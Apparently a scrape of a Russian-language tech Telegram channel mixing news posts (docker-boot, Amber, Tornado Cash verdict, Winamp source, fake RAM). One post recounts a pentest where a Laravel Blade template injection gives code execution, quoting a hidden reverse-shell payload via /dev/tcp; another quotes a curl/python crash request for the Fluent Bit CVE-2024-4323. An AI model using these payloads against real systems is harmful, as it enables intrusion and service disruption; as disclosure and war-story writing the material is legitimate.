Технологический Болт Генона

docker-boot replaces your current running system with an in-memory root filesystem constructed from a Docker image. https://github.com/purplesyringa/docker-boot

Modern syntax
Amber is designed based on the ECMA script syntax. The goal was to create a syntax that any developer could feel comfortable with. Hence, Amber draws on features from languages like Rust and Python.

https://docs.amber-lang.com/getting_started/getting_started#type-safety Amber the programming language compiled to bash https://github.com/Ph0enixKM/Amber ЗЫ Даже на freshports уже есть 🌝 https://www.freshports.org/lang/amber/

Кстати, а это про #поИб прямо и про самых заядлых нарушителей политик и вредителей безопасности ИБ в компании -- маркетологов! Они хотят и внешние JS притащить, и сервисы какие-то прокинуть и лендосостроителями быть на внещних сервисах да так, чтобы потом и DNS забыть удалить и довести до subdomain takeover, но сейчас не про это. В рамках одно пентеста был просто неистовый ор и 1. Регистрация в админке, которая реально работает (да да да) 2. Конечно, там не всё доступно, функциональность урезана, но частично оказалась доступна функциональность редактирования писем с IDOR (дооо, это как оказалось потом -- это было очень нужно маркетологам было чтобы они быстро меняли тексты для нужд бизнеса). И вот когда я увидел там конструкцию {{smtng}}, да и зная что там #laravel стало понятно что перед лицом blade шаблонизатор в котором есть RCE через @php /*code*/ @endphp 3. Да, я взял первый попавшийся шаблон, а это было восстановление пароля, вставил туда <div style="display:none">@php phpinfo(); @endphp</div> и получил себе phpinfo в почту. Но так как это аффектило всех юзеров -- я сделал это невидимым через <div style="display:none">. Что дальше можно сделать? Да все что угодно, да хоть ревесшел открывать через <div style="display:none">@php exec("/bin/bash -c 'bash -i >& /dev/tcp/REDACTED/8433 0>&1'"); @endphp</div>. Маркетологи с их хотелками, которые ходят мимо ИБ -- зло, а разработчики что дают шаблонизаторы без секьбрити политик и ограничений -- тоже зло :)

Пример запроса, вызывающего аварийное завершение:

   python3 -c 'print("{\"output\":\"stdout\", \"params\": {\"format\": \"json\"},\"inputs\":[\"" + "A"*8 + "\"," + str(0xffffffff) + ", \"" + "B"*500 + "\"]}")' > test
   curl -v http://:2020/api/v1/traces/ -H "Content-Type: application/json" -H "Expect: " --data "@test"

В процессе экспериментов исследователям удалось добиться аварийного завершения сервиса и определить остаточное содержимое памяти, используемой при обработке HTTP-запросов и содержащей, например, фрагменты конфиденциальных данных, таких как ключи доступа. Так как проблема приводит к зависящему от передаваемых параметров переполнению буфера, теоретически она может быть эксплуатирована для выполнения своего кода в системе, но выявившими проблему исследователями эта возможность не проверялась из-за отсутствия времени на работу над эксплоитом.

Уязвимость в Fluent Bit, затрагивающая многих облачных провайдеров https://www.opennet.me/opennews/art.shtml?num=61229 Оригинал https://www.tenable.com/blog/linguistic-lumberjack-attacking-cloud-services-via-logging-endpoints-fluent-bit-cve-2024-4323

Двое моих старых хороших знакомых Андрей (@coreglitch) и Лёня (@sntxerror), с которыми мы ещё B4CKSP4CE (https://0x08.in/) делали лучше, решили замутить совместный проект Это модульный синт, который должен быть дешёвым и миниатюрным Проект собирается идти на Kickstarter и стать полностью открытым во всех своих частях и компонентах Записаться в waitlist можно по ссылке на сайте - https://microrack.org/ Канал проекта - @microrack ЗЫ Андрей был одно время CTO Flipper'а, так что опыт в запуске штук интересных у него есть 🌝

В Алмате наконец-то открывается хакерспейс — пространство для коллаборации и общения между IT-специалистами из разных областей 🔥 Хакерспейс — в первую очередь люди, поэтому мы ждём новых участников и резидентов. Хочешь узнать что-то новое, поделиться знаниями, найти новых друзей и единомышленников или просто выпить чаю? Тебе к нам! 🙏 Ждём всех на день открытых дверей. В программе напитки, пицца и доклады от нынешних участников пространства ✨ Артем Иргебаев a.k.a. Господин Собака — О хакерспейсах в частности и о хакерской культуре в целом Валерий Блонский — Атаки на WiFi WPS и инструменты для них Tofik Khairanov a.k.a. tshark — Account takeover. Методы воспроизведения атаки — теория и практика Ждём вас 25.05 в 18:00 по адресу ул. Айманова, 65. Инструкцию о том, как к нам пройти, смотрите по ссылке. Отдельно благодарим компанию “TSARKA” за помощь и поддержку в ремонтных и интерьерных работах, а также за проявленный интерес ❤️

В результате абсолютной и безоговорочной победы голландского правительства Алекс Перцев получил максимально возможный срок заключения, несмотря на его полную неспособность предотвратить незаконное использование Tornado Cash. Тем самым голландская судебная система создала чудовищный прецедент, заявив, что любой разработчик децентрализованного, устойчивого к внешним факторам протокола или инструмента должен вечно нести уголовную ответственность за каждого пользователя своего инструмента. Этот вердикт может иметь далеко идущие последствия, поскольку приватность во многом зависит от децентрализованных, цензуроустойчивых инструментов или протоколов, таких как сеть Tor, Биткоин, Monero, SimpleX и многие другие.

Разбор вердикта суда в отношении разработчика Tornado Cash https://habr.com/ru/articles/814649/ + Оригинал Tornado Cash Developer Convicted https://freedom.tech/tornado-cash-developer-convicted/ ЗЫ Есть подкаст "Базовый Блок", который является для меня проводником в мир новостей блокчейна, и Алексей был там гостем вместе с командой Роман Сторм, Роман Семенов и Алексей Перцев (Tornado.Cash) о анонимности блокчейн-транзакций https://www.youtube.com/watch?v=DekXlhhS7KU Все три участника этого подкаста арестованы (Роман Семенов заочно).

> Winamp has announced that on 24 September 2024, the application's source code will be open to developers worldwide. Winamp has announced that it is opening up its source code to enable collaborative development of its legendary player for Windows. https://about.winamp.com/press/article/winamp-open-source-code

Память оказалась дважды фейковой. Махинациями в BIOS к объему установленного модуля памяти на 16 ГБ было добавлено еще 8 ГБ, якобы аппаратно зарезервированных за каким-то устройством. Сама память по записанным в SPD параметрам отличается о того, что написано на стандартной наклейке поверх чипов. Вместо частоты 2666 МГц DDR она работает лишь на 2133 МГц. Скорее всего, одни китайцы обманули других китайцев. Последние, скорее всего, по этому поводу нисколько не переживают, поскольку покупали самое дешевое, что нашли.

Разбор ноутбука с фейковой памятью из тех, что заполонили Ozon и Wildberries https://habr.com/ru/articles/814809/